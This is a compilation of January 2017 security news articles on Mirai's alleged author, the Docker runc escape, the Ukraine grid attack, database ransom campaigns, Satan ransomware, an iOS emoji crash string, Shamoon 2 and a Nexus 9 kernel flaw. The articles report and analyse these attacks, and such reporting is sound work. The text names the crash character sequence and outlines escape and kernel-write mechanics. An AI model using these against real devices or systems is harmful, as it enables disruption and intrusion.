The same IoT botnet was used to launch a massive Distributed Denial of Service (DDoS) attack against the website of the popular cyber security investigator Brian Krebs who decided to investigate about the author of the dangerous malware.

In October a hacker released the source code of the Mirai malware, a reference to the malicious code was spotted by Brian Krebs on the popular criminal hacker forum Hackforum. The Hackforum user with moniker “Anna-senpai” shared the link to the source code of the malware “Mirai.”

“The leak of the source code was announced Friday on the English-language hacking community Hackforums. The malware, dubbed ‘Mirai’ spreads to vulnerable devices by continuously scanning the Internet for IoT systems protected by factory default or hard-coded usernames and passwords.” reported Krebs.

mirai author botnet

The Mirai malware was specifically designed to infect Internet of Things (IoT) devices using the credential factory settings, a circumstance that is quite common in the wild.

Brian Krebs believes to have discovered the real identity of the mysterious Anna-senpai, his name is Paras Jha, the owner of a distributed denial-of-service (DDoS) attack mitigation company ProTraf Solutions.

“After months of gathering information about the apparent authors of Mirai, I heard from Ammar Zuberi, once a co-worker of ProTraf President Paras Jha.

Zuberi told KrebsOnSecurity that Jha admitted he was responsible for both Mirai and the Rutgers DDoS attacks. Zuberi said when he visited Jha at his Rutgers University dorm in October 2015, Paras bragged to him about launching the DDoS attacks against Rutgers.” wrote Krebs.

“He was laughing and bragging about how he was going to get a security guy at the school fired, and how they raised school fees because of him,” Zuberi recalled. “He didn’t really say why he did it, but I think he was just sort of experimenting with how far he could go with these attacks.””

The man alleged created the Mirai botnet and spread it to recruit the largest number of IoT devices.

Krebs reported that in 2014, an earlier variant of the Mirai botnet was used to launch DDoS attacks against Minecraft servers which can generate up to US$50,000 a month.

Krebs discovered that Jha along with other players developed the Mirai bot and used it to power an attack against the Minecraft servers to lure disgruntled customers. The providers that ignored Jha’s requests were hit by massive DDoS attacks.

Krebs explained that Jha contacted upstream providers to request the shutdown of rival IoT firms, then he developed the Mirai bot to attack rival Qbot botnets.

Krebs cited a Webinar presented on December 16, by the experts at the firm Digital Shadows that exposed the findings on the investigation about the Mirai author’s real life identity. According to Digital Shadows, the person behind the Anna-Senpai moniker also used the nickname “Ogmemes123123” and the email address ogmemes123123@gmail.com. He also discovered that the Mirai author has used another nickname, “OG_Richard_Stallman,” a clear reference to the founder of the Free Software Foundation. The ogmemes123123@gmail.com account was also used to register a Facebook account in the name of OG_Richard Stallman.

That Facebook account reports that OG_Richard_Stallman began studying computer engineering at New Brunswick, NJ-based Rutgers University in 2015., the same University attended by Paras Jha. The Rutgers University suffered a series of DDoS attacks on its systems since 2015, the attacker suggested the school purchase a DDoS mitigation service.

Krebs also highlighted that the skills listed on Jha’s LinkedIn page are the same of the Mirai author Anna-senpai ‘s HackForums.

The Krebs’s analysis is very intriguing and full of details … enjoy it!

ProtonMail announced that its Tor Hidden Service is online
20.1.2017 securityaffairs Security

The popular encrypted email provider ProtonMail has launched the Tor Hidden Service to provide further protection to its users.
ProtonMail is the world’s largest encrypted email provider with over 2 million users worldwide. Its popularity exploded just after the US presidential election, its users include journalists, activists, businesses, and normal people that want to protect their security and privacy. The service is a free and open source, featuring strong end-to-end encryption and protected by Swiss privacy laws.

Implementing a Tor hidden service for ProtonMail Tor has numerous advantages for end-users, communications are protected by supplementary layers of encryption, user’ IP address is masqueraded by the anonymizing network, and such kind of service is able to bypass government censorship.

“There are several reasons why you might want to use ProtonMail over Tor. First, routing your traffic to ProtonMail through the Tor network makes it difficult for an adversary wiretapping your internet connection to know that you are using ProtonMail. Tor applies extra encryption layers on top of your connection, making it more difficult for an advanced attacker to perform a man-in-the-middle attack on your connection to us. Tor also makes your connections to ProtonMail anonymous as we will not be able to see the true IP address of your connection to ProtonMail.” a onion site,” ProtonMail explained in a blog post.

“Tor can also help with ProtonMail accessibility. If ProtonMail becomes blocked in your country, it may be possible to reach ProtonMail by going to our onion site. Furthermore, onion sites are “hidden” services in the sense that an adversary cannot easily determine their physical location. Thus, while protonmail.com could be attacked by DDoS attacks, protonirockerxow.onion cannot be attacked in the same way because an attacker will not be able to find a public IP address.”

The onion address for the ProtonMail Tor service:


Just for curiosity, the above address was generated by the company used spare CPU capacity to generate millions of encryption keys and then hashed them aiming to generate a more human readable hash. The address it can be easily remembered as:

proton i rocker xow


ProtonMail published detailed instructions on how to setup Tor and how to access the service over Tor. For example, in order to use the ProtonMail hidden service is it necessary to enable Javascript.Tor Browser disables Javascript by default, but you will need it for our onion site. You can do this by clicking the “NoScript” button and selecting “Temporarily allow all this page”:

“Tor Browser disables Javascript by default, but you will need it for our onion site. You can do this by clicking the “NoScript” button and selecting “Temporarily allow all this page”” reads the ProtonMail page.

The ProtonMail hidden service only accepts HTTPS connections, it uses a digital certificate issued by Digicert, the same CA used by Facebook for its Tor hidden service.

The ProtonMail hidden service could be reached via a desktop web browser and both iOS and Android apps.

Docker Patches Escape Container Vulnerability

20.1.2017 Securityweek Vulnerebility
Docker recently resolved a runc privilege escalation vulnerability that could be exploited by a malicious program to escape container and access the host.

Tracked as CVE-2016-9962, the security issue is created because runc passes a file descriptor from the host's filesystem to the "runc init" bootstrap process when joining a container. This means that a malicious process inside the container can gain access to the host filesystem with its current privilege set.

Discovered by Alexander Bergmann, the vulnerability is rather difficult to exploit, because the race window between join-and-execve is quite small. According to Docker’s CVE database, the privilege escalation issue is the result of insecure opening of file-descriptor. Docker 1.12.6 resolves the bug.

Because the issue resides in the runc code, other containers might also be affected, Aqua Security’s Sagie Dulce says. The vulnerability is triggered when exec-ing an application in an already running container, the security researcher explains.

The use of an inherited file descriptor inside the container allows a malicious process to access the file descriptor of a directory that resides on the host and then the rest of the host's filesystem. Because the bug can be leveraged for directory traversal to the host's file system, it results in an effective container escape, Dulce notes.

Apparently, exec-ing commands inside a running container is actually a bigger issue that the problem of an open file descriptor is part of. However, the window of opportunity where the container has access to the runc init process on the host is very small before the runc init process execs the command inside the container.

“This is because runc enters the namespace of the container before it execs the final command. This window could enable a container, for example, to list file descriptors on the host process, which can then lead it to the host’s file system. Because many containers run as root, this indeed has serious implications,” the researcher notes.

The issue can be exploited in containers that lack the CAP_SYS_PTRACE capability, although it is much easier to access the file descriptors if the capability exists. A correctly timed exploit can leverage the vulnerability without having control of the runc init process. “One can escape a container […] by simply patching runc to sleep before calling exec,” Dulce says.

According to Red Hat’s Dan Walsh, SELinux mitigates the vulnerability. “SELinux is the only thing that protects the host file system from attacks from inside of the container. If the processes inside of the container get access to a host file and attempt to read and write the content SELinux will check the access,” he explains.

The released patch for this issue ensures that there are no host file descriptors present in the runc init process. Moreover, the fix sets the runc init process as non-dumpable, before setns into the container, which apparently protects it from processes inside the container.

Ukraine Power Company Confirms Hackers Caused Outage

20.1.2017 Securityweek Hacking
The investigation is ongoing, but Ukraine’s national power company Ukrenergo has confirmed that the recent electricity outage in the Kiev region was caused by a cyberattack.

In a statement emailed to SecurityWeek on Thursday, Ukrenergo said a preliminary analysis showed that the normal operation of workstations and SCADA servers had been disrupted due to “external influences.”

The analysis indicates that the incident, described as a planned and layered intrusion, involved malware that allowed the attackers to remotely control internal systems. Investigators are in the process of establishing a timeline of events and identifying compromised accounts, points of entry, and devices infected with malware that may be lying dormant.

Ukrenergo is confident that the results of this investigation will help the company implement organizational and technological measures that would help prevent cyber threats and reduce the risk of power failure.

The incident took place on the night between December 17 and 18 at the substation in Pivnichna, causing blackouts in the capital city of Kiev and the Kiev region. Power was fully restored after just over an hour.

Ukrenergo officials immediately suspected external interference and brought in cybersecurity experts to conduct an investigation.

One of the experts involved in the probe told the BBC that the 2016 attacks were more sophisticated and better organized compared to the ones launched in December 2015. It also appears that several threat groups had worked together, and they may have tested techniques that could be used in other campaigns as well.

Russia is again the main suspect, the country being blamed for many of the cyberattacks launched recently against Ukraine.

A report published in October by Booz Allen Hamilton showed that the December 2015 attacks on Ukraine’s electric grid were part of a long-running campaign that also targeted the railway, media, mining and government sectors.

In the meantime, researchers continue to monitor KillDisk, one of the pieces of malware involved in the 2015 attack. They recently discovered that the destructive malware had turned into ransomware and started infecting Linux machines as well.

DHS Publishes National Cyber Incident Response Plan

20.1.2017 Securityweek Security
The U.S. Department of Homeland Security has published the National Cyber Incident Response Plan (NCIRP), which aims to describe the government’s approach in dealing with cyber incidents involving public or private sector entities.

The DHS started working on the NCIRP shortly after President Barack Obama released the Presidential Policy Directive on Cyber Incident Coordination (PPD-41) in July last year. After making available a draft in September, the DHS has now announced the release of the final version.

The NCIRP has three main goals: define the responsibilities and roles of government agencies, the private sector and international stakeholders; identify the capabilities required to respond to a significant incident; and describe how the government will coordinate its activities with the affected entity.

“The National Cyber Incident Response Plan is not a tactical or operational plan for responding to cyber incidents,” explained Homeland Security Secretary Jeh Johnson. “However, it serves as the primary strategic framework for stakeholders when developing agency, sector, and organization-specific operational and coordination plans. This common doctrine will foster unity of effort for emergency operations planning and will help those affected by cyber incidents understand how Federal departments and agencies and other national-level partners provide resources to support mitigation and recovery efforts.”

The NCIRP focuses on four main lines of effort: threat response, asset response, intelligence support, and affected entity response.

The lead federal agency for threat response is the Department of Justice through the FBI and the National Cyber Investigative Joint Task Force (NCIJTF). Threat response includes mitigating the immediate threat, investigative activity at the affected organization’s site, collecting evidence and intelligence, attribution, finding links between incidents and identifying other affected entities, and finding opportunities for threat pursuit and disruption.

Asset response is handled by the DHS through the National Cybersecurity and Communications Integration Center (NCCIC). Activities in this line of effort include providing technical assistance to help affected entities protect their assets, reducing the impact of the incident, mitigating vulnerabilities, identifying other entities that may be at risk, and assessing potential risks to the affected sector or region.

Threat and asset response teams have some shared responsibilities, including the facilitation of information sharing and operational coordination, and providing guidance on the use of federal resources and capabilities.

The lead agency for intelligence support is the Office of the Director of National Intelligence (ODNI) through the Cyber Threat Intelligence Integration Center (CTIIC). The agency is tasked with providing support to asset and threat response teams, analyzing trends and events, identifying knowledge gaps, and mitigating the adversary’s capabilities.

If a significant cyber incident involves a federal agency, that agency is responsible for managing the impact of the incident. This can include maintaining business or operational continuity, protecting privacy, addressing adverse financial impact, breach disclosure and notification, and handling media and congressional inquiries.

If the incident affects a private entity, the role of the government is to be aware of that entity’s response activities and assess the potential impact on private sector critical infrastructure.

Ransack Campaigns Target Hadoop and CouchDB

20.1.2017 Securityweek Virus
Following a series of ransom attacks against MongoDB and Elasticsearch databases in recent weeks, many users of CouchDB and Hadoop are now finding their databases are under attack as well.

With the help of automated tools, attackers have been targeting Internet-acessible databases that haven’t been properly secured and either erasing or stealing data, followed by dropping a note demanding a specific ransom amount in exchange for the stolen data.

Insecure MongoDB installations were targeted first, and over 33,000 databases have already fallen victim to the attacks. However, as more hackers joined the rush, attackers started looking into alternatives, and Elasticsearch databases came into the crosshairs next.

Only several hundred such installations were targeted within the first couple of days, but the number has since grown to over 4,600 as of today, the public spreadsheet security researchers Victor Gevers and Niall Merrigan (who have been keeping an eye on these attacks since the beginning) use to track the campaign shows.

The attacks on MongoDB installations have reportedly slowed down, suggesting that hackers are focusing on Elasticsearch databases (over 30,000 of them are reportedly exposed) or other targets. With one actor actively attempting to sell the ransomware kit for MongoDB and Elasticsearch, it remains to be seen whether more attackers will start targeting these databases as well.

For now, however, it’s certain that Internet-facing CouchDB and Hadoop Distributed File System (HDFS) installations are potential victims to these attacks. The key change, however, is that hackers might no longer steal the data to hold it for ransom, but simply erase everything in an attempt to do harm.

While the number of CouchDB databases that have fallen to the ransom attack is still low, there are around 4,000 exposed instances, and their fate could turn for the worse if admins don’t secure them in a timely manner.

The public spreadsheet tracking attacks on Hadoop servers shows that 126 of them have been already vandalized and that there are three attackers actively pursuing them at the moment. There are between 8,000 and 10,000 HDFS installations out there, which means that attackers have quite the attack surface to enjoy.

Fidelis Cybersecurity Threat Research says that the attacks on HDFS installations (which started ramping up last week) are possible because admins use minimal security and made installations accessible from the Internet, and because denial of service (DoS) attacks have been trending up over the past years, especially in the enterprise segment.

Because HDFS installations using default configurations allow access without authentication, any attacker with basic proficiency in Hadoop can start deleting files. “On or around January 5 to January 6, traffic to port 50070 soared as attackers scanned for open HDFS installations to target,” Fidelis says.

To stay protected, admins need to follow some simple rules that apply to all databases, be them MongoDB, Elasticsearch, CouchDB, or HDFS: avoid exposing them to the Internet unless that is absolutely necessary, and use strong authentication settings (leaving default settings could mean that no authentication is required). Regularly backing up data helps restoration efforts after being hit.

With tens of thousands of databases already hit worldwide, it’s clear that admins need to take stance and up their security. Gevers and Merrigan have already made steps in preventing attacks, such as contacting local GovCERT teams to warn server owners that they are exposed. This reportedly resulted in critical Hadoop servers being pulled off the Internet.

The two security researchers have been hard at work over the past couple of weeks helping victims, and others have already joined their efforts, including Bob Diachenko, Matt Bromiley, and Dylan Katz.

Suspected Russian Hacker Wanted by U.S. Jailed in Spain

20.1.2017 Securityweek Hacking
An alleged Russian hacker wanted for fraud has been detained in Spain and jailed pending extradition to the United States, police and a court spokesman said Thursday.

Stanislav Lisov, a computer programmer, was wanted by US authorities, a spokesman for the Guardia Civil police force said.

"He is accused of conspiracy to commit fraud via electronic media and conspiracy to commit fraud and abuse with computers," a spokesman for Spain's top-level National Court added.

Lisov was detained last week in Barcelona's El Prat airport when he was about to board a flight, police said.

He was jailed on January 13 after being questioned via videoconference by a judge in Madrid's National Court, which investigates suspected crimes that have an international remit.

The judge decided to put him in prison as he does not live in Spain and could escape, and due to the "gravity of the offences."

"Now begins the process of extradition to the United States," the National Court spokesman said, without giving further details.

Satan, the ransomware-as-a-service surfaced in the dark web
20.1.2017 securityaffairs

The independent malware research @Xylit0l discovered the Satan ransomware, a malware belonging to the Gen:Trojan.Heur2.FU family.
Yesterday the independent malware research @Xylit0l discovered the Satan ransomware, a malware belonging to the Gen:Trojan.Heur2.FU family. Satan is provided as a RaaS (Ransomware-as-a-Service).

Xylitol @Xylit0l
New #RaaS https://www.virustotal.com/en/file/c04836696d715c544382713eebf468aeff73c15616e1cd8248ca8c4c7e931505/analysis/1484756083/ …
5:34 PM - 18 Jan 2017
72 72 Retweets 72 72 likes
The Satan ransomware used RSA-2048 and AES-256 cryptography, it appends the names of encrypted files with the “.stn” extension.


“As mentioned above, Satan’s developers provide a service allowing prospective cyber criminals to make money by distributing this ransomware. In exchange, developers receive 30% of revenues generated by users.” Reads the analysis published on pcrisk.com.

“The Satan platform has a user-friendly interface, it is really simple to use to create your own ransomware. Users just need to have a Bitcoin wallet to use for ransom payment. Wannabe criminals must specify the ransom amount in Bitcoin and furthermore they can decide to increase the amount of money to pay after a specific deadline.”

“Now, the most important part: the bitcoin paid by the victim will be credited to your account. We will keep a 30% fee of the income, so, if you specified a 1 BTC ransom, you will get 0.7 BTC and we will get 0.3 BTC. The fee will become lower depending on the number of infections and payments you have.” Reads the adv for the Satan Platform.

The Satan platform implements multiple services, including a dropper builder that is able to obfuscate malware code to avoid detection by virus scanners.


The RaaS solutions also allows used to choose a language different from English or Portuguese. The platform also allows crooks to update their ransomware.


Satan, while crypt, changes files’ extension in .stn for example myfile.txt in myfile.txt.stn.

Satan, once encrypted the files, creates an HTML file (HELP_DECRYPT_FILES.html) on desktop containing the ransomware note and instructions for the payment.

Crooks encourage victims to pay ransom to receive the private key for decrypt files. But never pay any ransom or attempt to contact these cyber criminals, because there is no guarantee that your files will be decrypted!.

Satan uses several anti-evasion and anti-debugging techniques, for example, it doesn’t run on a virtual machine making it difficult to analyze.

In a couple of days, crooks already released two version of the Satan platform.

Crashing iPhone Or iPad with a simple Emoji text message
20.1.2017 securityaffairs Apple

A simple sequence of three character-long text message containing Emoji can cause the block and the reboot os iPhones and iPads running iOS 10.1 or below.
A new Apple’s iOS bug was discovered in the community of mobile tech experts, it can be exploited to crash iPhone or iPad devices by just sending an Emoji text message.

Several users are already reporting the issue and the popular YouTube EverythingApplePro published a video proof-of-concept for the bug. In the video is reported an example of the sequence of characters that temporarily freeze an iPhone causing the device restarting.

The sequence is composed of a white Flag emoji, the digit “0” and a Rainbow emoji. The issue is linked to the way that iOS creates the rainbow flag emoji that is not an official emoji, Apple creates the rainbow flag Emoji by combining the code behind the two white flag and rainbow emoji. Apple iOS joins them by using a hidden character known as a VS16. The iPhone attempts to combine the two emoji, but is unable to because of the zero in the middle.

Emoji Text message crash
Source http://www.magazine49.com/archives/48106

There are also other ways to crash the Apple mobile device, another hack leverages the same characters used in a contact file that is sent to an iMessage contact via the iCloud’s sharing feature.
“Both the methods mentioned above will crash and iPhone or iPad to varying degrees, although the simple text string sent via a standard iMessage appears to affect iPhones and iPads running iOS 10.1 or below.” reported The Hacker News. “However, the boobytrapped contact card affects all versions of iOS 10, including Apple’s latest iOS 10.2 operating system.”

Users have to upgrade their version to the last one in order to prevent such kind of attacks.

Emoji text iPhone-freezing video

In November the EverythingApplePro reported that most of the Apple devices were crashing when the owners play a video. An iPhone-freezing video circulated online, when users played it in the Safari browser the iPhones slow down until they stop working altogether.

The iPhone-freezing video was first discovered by EverythingApplePro, it is a short .mp4 clip of someone standing by a bed with the words “Honey” written across the screen.

2016 Christmas Ukraine power outage was caused by hackers
20.1.2017 securityaffairs Hacking

Ukrenergo confirmed that preliminary results of its investigation showed that the Ukraine power outage occurred in December was caused by hackers.
In December 2016, the Government Ukraine energy company Ukrenergo suffered a severe power outage that affected the ”North” substation at Pivnichna. The incident caused blackouts in the city of Kiev and neighboring regions.

The head of the NEC “Ukrenergo” Vsevolod Kovalchuk explained in a message posted on Facebook that experts at the company were able to restore power in 30 minutes with a manual procedure. According to Kovalchuk, the operations were fully restored after just over an hour.

Kovalchuk pointed out that an equipment malfunction or a cyber attack can be the cause of the problem. According to Kovalchuk, an “external interference through the data network” could have caused the power outage.

Ukraine power outage

In a statement sent via email to SecurityWeek on this, Ukrenergo confirmed that preliminary results of its investigation showed that the normal operation of workstations and SCADA systems had been disrupted due to “external influences.”

Once broken in the target network, attackers used a malware to gain a remote control of systems at the power plant. Experts are still investigating to establish a timeline of events and identify the entry point of the hackers. They don’t exclude that the threat could still be inside the target network in a dormant state.

The company is working to secure its system by implementing organizational and technological measures that would make its systems resilient to further attacks.

“The cyber-security company Information Systems Security Partners (ISSP) has linked the incident to a hack and blackout in 2015 that affected 225,000.” reported the BBC. “ISSP, a Ukrainian company investigating the incidents on behalf of Ukrenergo, now appears to be suggesting a firmer link.

It said that both the 2015 and 2016 attacks were connected, along with a series of hacks on other state institutions this December, including the national railway system, several government ministries and a national pension fund.

Oleksii Yasnskiy, head of ISSP labs, said: “The attacks in 2016 and 2015 were not much different – the only distinction was that the attacks of 2016 became more complex and were much better organised.“”

Who is behind the power outage?

Intelligence experts suspect blames the Russia one again.

Shamoon 2 Variant Targets Virtualization Products

19.1.2017 Securityweek Virus
A second variant of the Shamoon 2 malware discovered by researchers at Palo Alto Networks has been set up to target virtualization products, likely in an effort to increase the impact of the attack and make recovery more difficult for targeted organizations.

Shamoon, aka Disttrack, is a disk-wiping malware that became widely known in 2012, when it damaged 35,000 computers belonging to Saudi Arabian petroleum and natural gas company Saudi Aramco. A newer version of the threat, dubbed Shamoon 2, was recently used to target various organizations in the Persian Gulf, including Saudi Arabia’s General Authority of Civil Aviation (GACA), which has downplayed the impact of the attack.

Palo Alto Networks has come across two variants of Shamoon 2. The first variant, detailed shortly after the new attacks came to light, was configured to automatically start wiping infected systems in the evening of November 17, 2016, just as the work week ended in Saudi Arabia.

The second variant discovered by the security firm had been configured to start wiping infected systems at 1:30 AM (Saudi Arabia time) on November 29, when the majority of the targeted organization’s employees were likely at home.

The payload delivered in this second wave was similar to the first one, but experts did find some differences. Same as in the first attacks, Shamoon spread throughout the local network using legitimate domain account credentials, including ones belonging to users and administrators. Since many of these passwords were complex, researchers believe the threat actor may have obtained the information as a result of a previous attack.

Palo Alto Networks also highlighted that the second Shamoon 2 variant included credentials for virtualization products from Huawei, specifically virtual desktop infrastructure (VDI) products such as FusionCloud.

These credentials can be found in the vendor’s official documentation, which suggests that the attackers either knew that the organization had been using these credentials based on information collected in a previous attack, or they were simply hoping that the defaults had not been changed.

“VDI solutions can provide some protection against a destructive malware like Disttrack through the ability to load snapshots of wiped systems. Also, since FusionCloud systems run a Linux operating system, which would not be susceptible to wiping by the Windows-only Disttrack malware, this could be seen as a reasonable countermeasure against attacks like Shamoon,” Palo Alto Networks’ Robert Falcone wrote in a blog post.

“However, if the attacker was able to log into the VDI management interfaces using the account credentials they could manually carry out destructive activities against the VDI deployment, as well as any snapshot,” Falcone added.

Ukraine Power Company Confirms Hackers Caused Outage

19.1.2017 Securityweek Virus
The investigation is ongoing, but Ukraine’s national power company Ukrenergo has confirmed that the recent electricity outage in the Kiev region was caused by a cyberattack.

In a statement emailed to SecurityWeek on Thursday, Ukrenergo said a preliminary analysis showed that the normal operation of workstations and SCADA servers had been disrupted due to “external influences.”

The analysis indicates that the incident, described as a planned and layered intrusion, involved malware that allowed the attackers to remotely control internal systems. Investigators are in the process of establishing a timeline of events and identifying compromised accounts, points of entry, and devices infected with malware that may be lying dormant.

Ukrenergo is confident that the results of this investigation will help the company implement organizational and technological measures that would help prevent cyber threats and reduce the risk of power failure.

The incident took place on the night between December 17 and 18 at the substation in Pivnichna, causing blackouts in the capital city of Kiev and the Kiev region. Power was fully restored after just over an hour.

Ukrenergo officials immediately suspected external interference and brought in cybersecurity experts to conduct an investigation.

One of the experts involved in the probe told the BBC that the 2016 attacks were more sophisticated and better organized compared to the ones launched in December 2015. It also appears that several threat groups had worked together, and they may have tested techniques that could be used in other campaigns as well.

Russia is again the main suspect, the country being blamed for many of the cyberattacks launched recently against Ukraine.

A report published in October by Booz Allen Hamilton showed that the December 2015 attacks on Ukraine’s electric grid were part of a long-running campaign that also targeted the railway, media, mining and government sectors.

In the meantime, researchers continue to monitor KillDisk, one of the pieces of malware involved in the 2015 attack. They recently discovered that the destructive malware had turned into ransomware and started infecting Linux machines as well.

Security Bug Lurked in Nexus 9 Kernel for Two Years

19.1.2017 Securityweek Vulnerebility
A security vulnerability that allowed a privileged attacker to arbitrary write values within kernel space lurked in Nexus 9’s kernel for two years before being patched, IBM security researchers reveal.

Tracked as CVE-2016-3873, the vulnerability was found in the Tegra kernel branch and was assigned a high severity rating. It was found to plague Nexus 9 ever since its inception in November 2014, and was fixed in the security patch level of 2016-09-05, after being discovered in June 2016.

In its Sept. 2016 Security Bulletin, Google noted that this was an elevation of privilege vulnerability in the NVIDIA kernel and that local malicious applications could leverage it to execute arbitrary code within the context of the kernel. The bug first requires compromising a privileged process, thus was assigned a High severity rating.

IBM X-Force Application Security Research Team’s Sagi Kedmi, the researcher who discovered the bug, explains that a similar issue (CVE-2016-2443) was discovered by security researcher Marco Grassi in spring 2013. Found in the Qualcomm MDP Driver, this bug was patched in Google’s May 2016 Android Security Bulletin.

“Kernel arbitrary write primitives can be used to achieve kernel code execution, which completely compromises the security of the device, not including TrustZone. It increases the TrustZone attack surface and allows attackers to access application data and override the Security-Enhanced Linux (SELinux) policy,” Kedmi explains.

The vulnerable code in Nexus 9 begins with the registers debugfs file node, which is initialized with a specific file operation where, on write system call, the cl_register_write() function securely copies a user space buffer and parses its contents as two numeric values, val and offs. Next, the cl_dvfs_writel() function is fed the two values, and __raw_writel() is used to write value val at offs+, which results in an arbitrary kernel write.

The researcher analyzed the Discretionary Access Control (DAC) and Mandatory Access Control (MAC; SELinux on Android) to determine what active processes can trigger the vulnerability. When it comes to DAC, the attacker needs to execute the code under root within the debugfs SELinux context, so the researcher then looked at the contexts that could write to a debugfs file.

Looking into Nexus 9’s sepolicy (MOB30M), Kedmi found that SELinux-wise, all domains can open, write and append to any file with the debugfs context, and discovered that code execution within the zygote process, several system processes and some other processes can trigger and exploit the Android vulnerability.

“To exploit the vulnerability from an untrusted application security context, start by escalating privileges from an untrusted app to one of the contexts of the aforementioned processes. The commit that fixed the vulnerability indicates that Google simply removed the registers file from the debug file system. Clearly, the registers file node was not needed on production builds,” the researcher concludes.

Critical Infrastructure Security: Risks Posed by IT Network Breaches

19.1.2017 Securityweek Security
Critical infrastructure security

There have been several incidents recently where a critical infrastructure organization’s IT systems were breached or became infected with malware. SecurityWeek has reached out to several ICS security experts to find out if these types of attacks are an indicator of a weak security posture, which could lead to control systems also getting hacked.

Security incidents involving critical infrastructure organizations

There are only a few publicly known examples of cyberattacks targeting an organization’s industrial control systems (ICS), including the recent Ukraine energy sector incidents and the 2010 Stuxnet attacks. However, there are several known incidents involving the IT networks of critical infrastructure organizations.

One recent report comes from Japan, where attackers last year stole the details (report in Japanese) of more than 10,000 employees of Taiyo Nippon, the country’s largest industrial gas producer and one of the world’s top gas suppliers. The breach, which took place in March 2016, did not affect any control systems, the company said.

In April, we learned that two widely used pieces of malware, namely Conficker and Ramnit, had been found on systems belonging to a German nuclear energy plant in Gundremmingen. Experts believe these systems were likely infected by accident rather than as a result of targeted attacks.

Also in April, the Board of Water and Light (BWL) in Lansing, Michigan, was hit by a piece of ransomware, but the organization said the malware only affected the corporate network, with no disruption to water or energy supplies.

The Grizzly Steppe report published recently by the U.S. government in an effort to help organizations detect attacks launched by Russia-linked threat actors has led to the discovery of suspicious traffic at two organizations: the Burlington Electric Department in Vermont, and the Hydro One electricity distributor in Canada. Both organizations said the electric grid was never at risk.

Experts comment on the risks posed by such incidents

SecurityWeek has reached out to several industrial cybersecurity companies to find out if more damaging attacks may be possible given the holes in these organizations’ security.

Robert M. Lee, CEO and founder of Dragos, Inc., believes poor security practices and poor network segmentation can lead to a number of control system issues.

“Often if the pathways into the IT side of the network are easily taken advantage of, you will find that pathways into the ICS are also easily taken advantage of; however this is not the case in every site and we have seen a significant increase in security by many organizations out there,” Lee said.

Lane Thames, software development engineer and security researcher at Tripwire, also believes that a weak security posture on the IT side can lead to breaches on the OT side, particularly in the case of organizations that have started migrating OT systems to communication technologies (e.g. Ethernet, IP networking, Wi-Fi).

“For example, I have seen a single advanced manufacturing system with over 50 Ethernet ports, each one assigned its own IP address, that was controlled through a web based interface. If an attacker can penetrate the web server hosting the interface, then it is possible to penetrate the physical manufacturing device,” Thames said.

However, Lee and Thames agree that a security incident does not necessarily imply a poor security posture – even organizations with good security practices can get breached.

Opportunistic vs. targeted attacks

While critical infrastructure organizations may be breached by opportunistic threat actors that launch attacks indiscriminately for financial gain, experts believe some of these incidents could represent the reconnaissance phase of a targeted operation; although they have pointed out that targeting ICS is not the same as targeting IT networks.

“The sophistication of some of the attacks on certain industrial facilities points to actors far more capable than your opportunistic hacker,” said Eddie Habibi, CEO of PAS. “If cybersecurity is going to be the new WMD (weapons of mass destruction) in the future, which we believe it has the proclivity to be, you have to also believe that every nation is right now trying to build both their offensive and defensive cyber capabilities. That includes reconnaissance, spyware, Trojan horse and more.”

SAVE THE DATE: ICS Cyber Security Conference | Singapore - April 25-27, 2017

Thames explained, “Reconnaissance is really always in the picture. Further, mainstream attacks are also always in the mix. However, on the industrial side you will also see attacks that are more tailored to the target industry with very specific objectives driving the attack. For example, manufacturing organizations will often be targeted with a goal of stealing sensitive information and intellectual property.”

Despite the differences, experts believe industrial networks are not necessarily more difficult to attack.

“Cyber attacks on industrial control networks are very different from attacks on IT networks because the infrastructures are inherently different. ICS networks contain specialized technologies that operate the different processes. Therefore reconnaissance is always an important phase in which the attacker carefully learns which technologies are in place and how they are operated,” explained Barak Perelman, CEO of Indegy. “This doesn’t make industrial networks more difficult to attack. On the contrary - it is quite easy to attack them.”

Lee has pointed out that the only targeted attacks covered by the mainstream media in 2016 were the ones aimed at Thyssenkrupp and Ukraine’s energy sector. However, the expert said there were a number of targeted threat incidents last year that were not made public.

Securing ICS systems vs. securing corporate networks

SecurityWeek has asked experts about the differences between an organization’s approach when securing their business network versus securing their OT network.

Stephen Ward, Claroty: “The OT domain was not purposely built with security in mind - it was built with reliability, safety and up-time at the core. It is a very complex environment that is sensitive to any potential disruption. When looking at security solutions for the OT domain, organizations have to ensure that no potential harm is introduced into the OT network - they're incredibly concerned with this and in the past this has resulted in IT security people introducing potential controls but OT network personnel disqualifying those approaches. OT security solutions need to be just that - purpose built with an understanding of the complexities of these networks. Passive security solutions - such as real-time monitoring and detection - are on the top of the list for OT security improvements as a result.”

Lane Thames, Tripwire: “Often, there are differences within the organizations themselves (at least that has been the case historically). OT focuses on “mission assurance” whereas IT focuses on “information assurance”. These two objectives are vastly different, and, based on my discussions with practitioners in the industry, it creates communication breakdowns and barriers when an organization with IT and OT approaches security operations. For example, a control engineer could care less about data loss whereas an IT system administrator could care less about air-gapping the battery backup units (UPSs).”

Eddie Habibi, PAS: “The difference is stark. Folks who are focused on protecting business networks concern themselves with protecting information. OT cybersecurity personnel are singularly focused on protecting the physical process plant and safety. These approaches lead to very different cybersecurity decisions. An OT system, for instance, may never have a patch applied if there is a perceived risk it will disrupt production. Instead, they will add security controls in front of that system to mitigate risk. A zero day vulnerability can become a forever day vulnerability. In an IT approach, the patch is applied in real-time. Policies are in fact in place to make sure patches are kept up to date.”

Robert Lee, Dragos: “There must be largely different approaches and processes for securing the OT networks than the IT networks. Simply put, these networks have more serious consequences that can occur from bad practices and they often cannot be secured in the same way. As an example, simply deploying antivirus to the ICS would not significantly contribute to security, and may actually detract from it, whereas that is a common practice in IT security. There need to be tailored methodologies, processes for authorization and ownership of problems, and a different view of the risk management.”

Barak Perelman, Indegy: “There is a huge difference in approaches. OT networks involve different technologies and have different security gaps that should be addressed. Even the network activity is different and uses different protocols. In addition, process stability, safety and continuity is a top priority in these environments. Therefore, any modifications that could impact operations are indefinitely postponed. This means that patches, upgrades and other changes are rarely made.

[...] Implementing network security in ICS environments poses unique challenges since it requires in-depth understanding of the intricacies of OT network activity.”

Credential Stuffing: a Successful and Growing Attack Methodology

19.1.2017 Securityweek Attack
With a database of 1 million stolen credentials, criminals using a credential stuffing attack with a tool such as Sentry MBA could expect to compromise roughly 10,000 accounts on a targeted but uncompromised site. In 2016, 3.3 billion user credentials were spilled onto the internet, according to figures from Shape Security's just released 2017 Credential Spill Report.

